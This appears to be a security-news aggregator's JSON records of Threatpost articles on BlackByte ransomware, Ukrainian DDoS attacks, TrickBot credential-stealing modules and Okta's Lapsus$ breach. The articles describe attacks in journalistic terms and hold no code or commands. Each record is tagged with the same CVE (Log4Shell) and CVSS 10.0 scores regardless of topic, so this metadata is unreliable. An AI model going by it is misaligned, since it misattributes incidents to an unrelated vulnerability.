Once access is compromised, it is only a matter of time before ransomware is deployed.\u201d\n\n## Attack Follows Fast on Heels of Feds\u2019 Warning\n\nThe attack on the 49ers came two days after the FBI and Secret Service jointly announced ([PDF](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUUbpcdscHseLY8WazRItLnvQN0VOFtB523D1IckBDm3GWtAqMavOMkuJNpigwSlS1g-3D-3DHlt-_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad8NDtarbSFgOPpChaB5aAApmeE6Evp0nlfflzt6YSNEz28O2-2FHVrXE7UpGyDfGGnBrtBafeOs6MMZggCxPxBbybJxY4biqI68o3SzC6P2alu5pOZYg8dCtwmTO8AsZdPZl-2FU0cFcl7EEwBgimP9SeuFQXnQpQV9tiXU6qxQF2CVPNMtkNDR2cc1IBMMBK5HJ1DayKvUXhcyXH9vms3utwb-2BVTPSyYRG5jUH2iQhd-2BCWA-3D>)) that BlackByte ransomware has breached the networks of at least three organizations from U.S. critical infrastructure sectors in the last three months.\n\n\u201cAs of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture),\u201d the Feds said in a TLP:WHITE joint cybersecurity advisory released on Friday.\n\n## BlackByte\u2019s Back\n\nThe gang [emerged](<https://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/>) in July 2021, when it started preying on organizations by exploiting known Microsoft Exchange [vulnerabilities](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) \u2013 such as [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) \u2013 to claw its way into environments.\n\nIt worked for a while: BlackByte scored wins against manufacturing, healthcare and construction industries in the United States, Europe and Australia. 
But the gang hit a wall when, months later, Trustwave released a free [decryption tool](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/>) that allowed BlackByte victims to unsnarl their files.\n\nAs Trustwave said in October, the security firm found BlackByte to be a ransomware weirdo, for these reasons:\n\n 1. Same as other notorious ransomware variants like REvil, BlackByte also avoids systems with Russian and ex-USSR languages.\n 2. It has a worm functionality similar to RYUK ransomware.\n 3. It creates a wake-on-LAN magic packet and sends it to the target host \u2013 making sure they are alive when infecting them.\n 4. The author hosted the encryption key in a remote HTTP server and in a hidden file with .PNG extension.\n 5. The author lets the program crash if it fails to download the encryption key.\n 6. The RSA public key embedded in the body is only used once, to encrypt the raw key to display in the ransom note \u2013 that\u2019s it.\n 7. The ransomware uses only one symmetric key to encrypt the files.\n\nAs far as BlackByte\u2019s auction site for selling victims\u2019 data goes, it\u2019s apparently a house of mirrors. While the site claims to contain exfiltrated data from victims, the ransomware itself doesn\u2019t have the ability to exfiltrate data, Trustwave\u2019s Rodel Mendrez and Lloyd Macrohon wrote. \u201cThis claim is probably designed to scare their victims into complying,\u201d they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14203910/BlackBytes-Onion-Site.png>)\n\nBlackByte\u2019s Onion site. 
Source: Trustwave.\n\nAs the Trustwave analysts pointed out in October, the group uses simplistic encryption techniques, using just one symmetric key to encrypt files in AES, as opposed to using unique keys for each session.\n\nBut despite the setback of Trustwave\u2019s decryptor and what experts think of as its simplistic encryption, BlackByte is clearly doing just fine, given the FBI/Secret Service alert on Friday.\n\nMatthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology, called BlackByte a \u201cgrowing ransomware operator\u201d that\u2019s benefited from following successful patterns implemented by previous groups.\n\n\u201cSimilar to [Conti](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) ransomware, BlackByte has been identified using Exchange vulnerabilities such as ProxyShell to gain a foothold in environments,\u201d Warner observed to Threatpost on Monday. \u201cAdditionally, BlackByte utilizes well-proven tactics such as Powershell exploitation of obfuscated base64 content to perform all encryption on hosts once exploited.\n\n\u201cIn the end, BlackByte is by no means more sophisticated than other actors in the ransomware universe but rather are the next up-and-coming player to exploit organizations and their data,\u201d Warner added via email.\n\n## Critical Infrastructure\n\nErich Kron, security awareness advocate at KnowBe4, focused on the FBI warning about BlackByte\u2019s success in penetrating the critical infrastructure sector: a sector that\u2019s been \u201cplagued\u201d by ransomware attacks, he said.\n\n\u201cThe criticality of the systems makes quick recovery vital, which increases the likelihood that the victims will pay the ransom,\u201d Kron said in a Monday email. \u201cThis same criticality also makes law enforcement attention much more likely. 
However, given the low success rate of law enforcement busts, this is often a chance the groups are willing to take.\u201d\n\nKron blamed limited budgets, aging equipment and shortages in cybersecurity staff for making critical infrastructure and many government entities especially vulnerable to ransomware attacks.\n\n\u201cThese groups must focus on the top attack vectors used in ransomware attacks, usually email phishing and attacks on remote access portals,\u201d he advised. \u201cTraining the users to spot and report phishing emails and improving the organizational security culture, along with ensuring remote access portals are monitored for brute force attacks and that credentials being used have Multi-Factor Authentication (MFA) enabled are some top ways to counter these threats.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T02:04:36", "type": "threatpost", "title": "BlackByte Tackles the SF 49ers & US Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T02:04:36", "id": "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "href": "https://threatpost.com/blackbyte-tackles-the-sf-49ers-us-critical-infrastructure/178416/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. 
The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond Ukraine are worth noting, researchers said.\n\nThe targets were core Ukrainian institutions: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPS requests.\u201d\n\n## **What Happened?**\n\nBy overloading the targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports, however, were debunked, [according to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability_ of these websites and services, but not the _integrity_ of any data. 
Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. \u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine\u2019s (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed 
but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks designed to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u201d\n\nAnd indeed, in the past two months, Russian advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers, however, noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. 
\u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere are no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. 
or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. 
And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": 
"THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:40", "description": "Cyberattackers are targeting 60 different high-profile companies with the TrickBot malware, researchers have warned, with many of those in the U.S. The goal is to attack those companies\u2019 customers, who are being cherry-picked for victimization, according to Check Point Research (CPR).\n\nAccording to a Wednesday [CPR writeup](<https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/>), TrickBot is targeting well-known brands that include Amazon, American Express, JPMorgan Chase, Microsoft, Navy Federal Credit Union, PayPal, RBC, Yahoo and others.\n\n\u201cTrickbot attacks high-profile victims to steal the credentials and provide its operators access to the portals with sensitive data where they can cause greater damage,\u201d researchers noted in their report. \n\nOn the technical front, the variant that\u2019s being used in the campaign has also added three interesting modules, and new de-obfuscation and anti-analysis approaches, researchers added.\n\n## **TrickBot\u2019s Back with a New Bag**\n\nThe TrickBot malware was originally a banking trojan, but it has evolved well beyond those humble beginnings to become a wide-ranging credential-stealer and initial-access threat, often responsible for fetching second-stage binaries such as ransomware.\n\nSince the [well-publicized law-enforcement takedown](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) of its infrastructure in October 2020, the threat has clawed its way back, now sporting more than 20 different modules that can be downloaded and executed on demand. 
It typically spreads via emails, though the latest campaign adds self-propagation via the EternalRomance vulnerability.\n\n\u201cSuch modules allow the execution of all kinds of malicious activities and pose great danger to the customers of 60 high-profile financial (including cryptocurrency) and technology companies,\u201d CPR researchers warned. \u201cWe see that the malware is very selective in how it chooses its targets.\u201d\n\nIt has also been seen [working in concert](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) with a similar malware, Emotet, which suffered its own [takedown](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) in January 2021.\n\nCPR, from its own telemetry alone, found that TrickBot overall has seen more than 140,000 successful infections since the takedown; and researchers noted that it\u2019s back to taking first place in malware prevalence lists.\n\n## **Fresh Modules for Rotting Infections**\n\nThe version of TrickBot that CPR found being used in the current campaign sports three freshened-up modules of note, researchers said:\n\n * injectDll\n * tabDll\n * pwgrabc\n\n### **TrickBot\u2019s \u2018injectDll\u2019: A Web-Injects Module**\n\nWeb injects are well-known from the banking-trojan world; they are used to present targets with overlaid facsimiles of real banking log-in sites; when a victim tries to sign on, they steal the credential data, and can pave the way for drained bank accounts and fraudulent wire transfers down the road.\n\nThis particular module has added a web-injects format from the [infamous Zeus banking trojan](<https://threatpost.com/trickbot-banking-trojan-module/167521/>), researchers said, which collects information from login actions on targeted sites and sends it to a command-and-control server (C2).\n\n\u201cThe injectDll module performs browser data injection, including JavaScript which targets customers of 60 high-profile companies,\u201d according to the writeup. 
\u201cAdd Trickbot\u2019s cherry-picking of victims, and the menace becomes even more dangerous.\u201d\n\nOn the anti-analysis front, the payload injected into the banking site\u2019s page is minified (shrinking the code size also makes it hard to read), obfuscated and contains anti-deobfuscation techniques, researchers said. The final payload, which contains the actual code that grabs the victim\u2019s keystrokes and web form submit actions, is also minified and obfuscated and contains a few layers of anti-deobfuscation techniques, they said.\n\n\u201cUsually a researcher tries to analyze minified and obfuscated JavaScript code using tools like JavaScript Beautifiers, deobfuscators like de4js, and so on,\u201d they explained. \u201cAfter we applied these tools, we noticed that although the code became more readable, it also stopped working.\u201d\n\nAnother anti-analysis technique they observed involved researchers sending automated requests to the C2 to get fresh web-injects: \u201cIf there is no \u2018Referer\u2019 header in the request, the server will not answer with a valid web-inject,\u201d according to CPR.\n\n\u201cWe not only see variants created based on more recently successful malware, but we even see threat actors use malware that is even twenty years old to generate new variants,\u201d Saryu Nayyar, CEO and founder at Gurucul, said of the Zeus connection, via email. \u201cAs can be seen by TrickBot, even when a threat actor group is broken up, their legacy lives on as other groups can inherit their tools, tactics and procedures with their own modifications and improvements to evade current detection techniques.\u201d\n\n### **TrickBot\u2019s \u2018tabDLL\u2019 Module**\n\nThe second new development is a dynamic link library (DLL), also used to grab user credentials. Its ultimate goal is to spread the malware via network shares, researchers noted.\n\ntabDLL uses a multi-step process, as CPR laid out. 
In sequence, the module does the following:\n\n 1. Enable the storing of user credential information in the LSASS application;\n 2. Inject the \u201cLocker\u201d module into the legitimate explorer.exe application;\n 3. From the infected explorer.exe, force the user to enter login credentials to the application, then lock the user\u2019s session;\n 4. Store the credentials in the LSASS application memory;\n 5. Grab the credentials from the LSASS application memory using [Mimikatz](<https://www.varonis.com/blog/what-is-mimikatz>), which is an open-source tool for extracting data from an application\u2019s memory;\n 6. Report credentials to the C2;\n 7. And, use the [EternalRomance exploit](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>) to spread to other targets inside the network via SMBv1 network shares.\n\n### **TrickBot\u2019s \u2018pwgrabc\u2019 Module**\n\nThe pwgrabc module, as its name suggests, is a catch-all credential stealer for various applications.\n\nThe targeted applications are as follows: AnyConnect; Chrome; ChromeBeta; Edge; EdgeBeta; Filezilla; Firefox; Git; Internet Explorer; KeePass; OpenSSH; OpenVPN; Outlook; Precious; Putty; RDCMan; RDP; TeamViewer; VNC; and WinSCP.\n\nOverall, the campaign is a nice mix of skills, the researchers concluded.\n\n\u201cBased on our technical analysis, we can see that TrickBot authors have the skills to approach the malware development from a very low level and pay attention to small details,\u201d they said. \u201cMeanwhile\u2026we know that the operators behind the infrastructure are very experienced with malware development on a high level as well. TrickBot remains a dangerous threat.\u201d\n\n_**Join Threatpost on Wed. 
Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T22:34:52", "type": "threatpost", "title": "TrickBot Ravages Customers of Amazon, PayPal and Other Top Brands", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T22:34:52", "id": "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", 
"href": "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T18:36:10", "description": "On Friday, Okta \u2013 the authentication firm-cum-Lapsus$-victim \u2013 admitted that it \u201cmade a mistake\u201d in handling the [recently revealed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) Lapsus$ attack. \n\nThe mistake: trusting that a service provider had told Okta everything it needed to know about an \u201cunsuccessful\u201d account takeover (ATO) at one of its service providers and that the attackers wouldn\u2019t reach their tentacles back to drag in Okta or its customers. \n\nWrong-o, it turned out: About a week ago, Lapsus$ bragged about having gotten itself \u201csuperuser/admin\u201d access to Okta\u2019s internal systems, gleefully posting proof and poking fun at Okta for its denials that the Jan. 20 attack had been successful. \n\nIn an [FAQ](<https://support.okta.com/help/s/article/Frequently-Asked-Questions-Regarding-January-2022-Compromise?language=en_US>) published on Friday, Okta offered a full timeline of the incident, which started on Jan. 20 when the company learned that \u201ca new factor was added to a Sitel customer support engineer\u2019s Okta account.\u201d\n\n## What Happened at Sitel \n\nThe target of the Jan. 20 attack was Sykes Enterprises, which Sitel acquired in September 2021. Okta has referred to the company as Sitel \u2013 a third-party vendor that helps Okta out on the customer-support front \u2013 in its updates and FAQ. \n\nThe threat actor failed in its attempt to add a new factor \u2013 a password \u2013 to the Okta account of one of Sitel\u2019s customer support engineers. 
Okta Security had received an alert that a new factor was added to a Sitel employee\u2019s Okta account from a new location and that the target didn\u2019t accept a multifactor authentication (MFA) challenge, which Okta said blocked the intruder\u2019s access to the Okta account. \n\nNonetheless, \u201cout of an abundance of caution,\u201d the next day \u2013 Jan. 21 \u2013 Okta reset the account and notified Sitel. On the same day, Okta Security shared indicators of compromise (IOC) with Sitel, which told Okta that it had retained outside support from \u201ca leading forensic firm.\u201d\n\nAccording to the full report that Sitel commissioned, the threat actor had access to Sitel\u2019s systems for a five-day window, from Jan. 16-21: dates that back up the screenshots that Lapsus$ posted on March 21. \n\nDuring the five-day window wherein it had access to Sitel, the attacker\u2019s only action was the attempted password reset.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/28140124/Screen-Shot-2022-03-28-at-1.59.44-PM-1-e1648490538671.png>)\n\nTimeline of Okta hack. Source: Okta.\n\n## How Okta Screwed Up\n\nAs far as why Okta didn\u2019t notify customers when it learned of the ATO attack in January, it acknowledged on Friday that \u201cwe made a mistake.\u201d \n\n\u201cSitel is our service provider for which we are ultimately responsible,\u201d it admitted in the Friday FAQ. \n\nYou can\u2019t know what you don\u2019t know, though: \u201cIn January, we did not know the extent of the Sitel issue \u2013 only that we detected and prevented an account takeover attempt and that Sitel had retained a third party forensic firm to investigate,\u201d Okta said. \u201cAt that time, we didn\u2019t recognize that there was a risk to Okta and our customers. 
We should have more actively and forcefully compelled information from Sitel.\u201d\n\nCoulda, woulda, shoulda, it said: \u201cIn light of the evidence that we have gathered in the last week, it is clear that we would have made a different decision if we had been in possession of all of the facts that we have today.\u201d\n\nIt must be a painful mea culpa: Okta\u2019s share price had dropped nearly 15 percent as of Friday. As the Wall Street Journal [reported](<https://www.wsj.com/articles/okta-faces-long-road-back-11648211400>), that\u2019s a common reaction after major cyber attacks, such as those at SolarWinds, Mimecast and Mandiant, all of which saw shares slide after they reported their own incidents. \n\nThe WSJ\u2019s headlines say it all: \u201cIdentity-management company has strong market position, but business impact of recent hack won\u2019t be clear for a while,\u201d the business daily said on Friday, predicting that \u201cOkta Faces Long Road Back.\u201d \n\n## Potential Extent of Compromise\n\nIn its Friday FAQ, Okta said that, as detailed in [its blog](<https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/>), the company has already identified and contacted 366 potentially affected customers. Okta service itself was not breached, it said: \u201cThere is no impact to Auth0 or AtSpoke customers, and there is no impact to HIPAA and FedRAMP customers.\u201d\n\nAs such, customers don\u2019t have to reset passwords, Okta said: \u201cWe are confident in our conclusions that the Okta service has not been breached and there are no corrective actions that need to be taken by our customers.\n\n\u201cWe are confident in this conclusion because Sitel (and therefore the threat actor who only had the access that Sitel had) was unable to create or delete users, or download customer databases.\u201d\n\nThat lack of access is by design, Okta explained. 
